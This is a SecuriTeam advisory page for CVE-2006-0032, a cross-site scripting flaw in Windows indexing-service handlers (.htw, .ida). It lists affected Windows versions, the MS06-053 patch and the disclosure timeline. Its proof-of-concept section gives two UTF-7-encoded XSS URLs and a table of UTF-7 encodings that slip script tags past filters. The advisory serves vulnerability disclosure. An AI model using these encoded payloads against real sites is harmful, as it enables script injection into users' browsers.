CVE-2006-0032

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam™
Beyond Security®

SecuriTeam™ Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

	SecuriTeam™ in Your Inbox

	E-mail this CVE-2006-0032 to a friend

New vulnerability?
New tool?
Tell us

Credit:
The information has been provided by Eiji James Yoshida.
The original article can be found at: http://www.geocities.jp/ptrs_sec/advisory09e.html

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Check for CVE-2006-0032

Vulnerability Assessment and Management.
Automated Pen Testing for 50 to 50,000 nodes
beyondsecurity.com/vulnerability-scanner

Affected Software:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
* Microsoft Windows Server 2003 x64 Edition

Proof of concept:
http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-+AC8-SCRIPT+AD4-.ida

UTF-7("<") = +ADw-, +ADx-, +ADy-, +ADz-
UTF-7(">") = +AD4-, +AD5-, +AD6-, +AD7-
UTF-7("/") = +AC8-, +AC9-

Patch:
Microsoft has released a patch in MS06-053 that resolves this issue: http://www.microsoft.com/technet/security/bulletin/ms06-053.mspx

Vendor status:
IPA/ISEC was notified on the 27th December 2005. Microsoft has released a patch for this vulnerability on the 12th September 2006.

CVE Information:
CVE-2006-0032

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus